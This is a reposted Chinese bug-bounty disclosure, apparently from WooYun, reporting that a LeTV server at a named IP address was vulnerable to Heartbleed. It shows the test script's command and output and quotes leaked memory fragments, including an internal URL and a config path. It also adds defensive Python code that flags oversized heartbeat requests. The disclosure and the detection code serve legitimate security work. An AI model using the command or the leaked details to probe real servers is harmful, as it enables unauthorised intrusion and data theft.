神刀安全网

Vulnerability in a LeTV (乐视) server

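Vulnerability title: Vulnerability in a LeTV (乐视) server
Vendor: LeTV (乐视网)
Author: 路人甲
Submitted: 2016-04-16 15:57
Disclosed: 2016-05-31 22:20
Vulnerability type: System/service patches not applied in time
Severity:
Self-assessed rank: 12
Status: Confirmed by the vendor
Tags: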

Vulnerability details

Site:

https://220.181.1.131/

Checking who the certificate was issued to:

The server is affected by the Heartbleed vulnerability, so data in the server's memory can be read directly.

C:/Python27/heartbleed-master-x>python hb-test.py 220.181.1.131
[+] Connecting...
[+] Sending ClientHello for TLSv1.0
[+] Waiting for Server Hello...
[+] Reveiced ServerHello for TLSv1.0
[+] Sending heartbeat request...
[+] Received heartbeat response:

The data read from memory should be enough to confirm that this server belongs to LeTV:

downloadUrl":"http://cloud.letv.com/uss/download…..

Site path:

letv/ups/openresty/nginx/ups_ngx_conf/x/fs_upload_pass

Repeatedly reading memory would capture even more data...
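For defenders, an added example (not part of the original report and not taken from hb-test.py): the session above sends the heartbeat right after ServerHello, before encryption starts, so a passive sensor can flag it by comparing the payload length the heartbeat claims with the size of the TLS record that carries it (RFC 6520 layout). The function names and the sample records are constructed for illustration.

```python
import struct

HEARTBEAT_CONTENT_TYPE = 24  # TLS record content type "heartbeat" (RFC 6520)
HEARTBEAT_REQUEST = 1        # heartbeat message type "request"
MIN_PADDING = 16             # RFC 6520: at least 16 bytes of padding


def record(ctype: int, fragment: bytes) -> bytes:
    """Build a TLSv1.0 record (used only to construct the sample below)."""
    return struct.pack("!BHH", ctype, 0x0301, len(fragment)) + fragment


def parse_records(stream: bytes):
    """Yield (content_type, fragment) for each complete TLS record."""
    offset = 0
    while offset + 5 <= len(stream):
        ctype, _version, length = struct.unpack_from("!BHH", stream, offset)
        fragment = stream[offset + 5 : offset + 5 + length]
        if len(fragment) < length:
            break  # truncated capture, nothing more to parse
        yield ctype, fragment
        offset += 5 + length


def check_heartbeat(fragment: bytes) -> str:
    """Classify one plaintext heartbeat fragment."""
    if len(fragment) < 3:
        return "malformed"
    hb_type, claimed = struct.unpack_from("!BH", fragment, 0)
    if hb_type != HEARTBEAT_REQUEST:
        return "not-request"
    # type (1) + length (2) + payload + minimum padding must fit in the record
    if 3 + claimed + MIN_PADDING > len(fragment):
        return "over-read"
    return "ok"


def scan(stream: bytes) -> list:
    """Return a verdict for every heartbeat record in a captured byte stream."""
    return [check_heartbeat(frag) for ctype, frag in parse_records(stream)
            if ctype == HEARTBEAT_CONTENT_TYPE]


# Constructed sample: a handshake record, a well-formed heartbeat, and a
# heartbeat that claims 0x4000 payload bytes but carries none.
SAMPLE = (
    record(22, b"\x01\x00\x00\x00")
    + record(24, struct.pack("!BH", 1, 4) + b"ping" + b"\x00" * MIN_PADDING)
    + record(24, struct.pack("!BH", 1, 0x4000))
)
```

Heartbeats sent after the handshake completes are encrypted, so this check only sees the pre-encryption case; it does not replace patching the affected OpenSSL build.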

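Proof of vulnerability:

Remediation:

Copyright notice: when reposting, please credit the source: 路人甲 @ WooYun (乌云)

[Copyright of this article belongs to SecPulse (安全脉搏); reposting without permission is prohibited. The article represents only the author's views. If you have a different opinion, you are welcome to add the SecPulse WeChat account, SecPulse, to discuss.]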
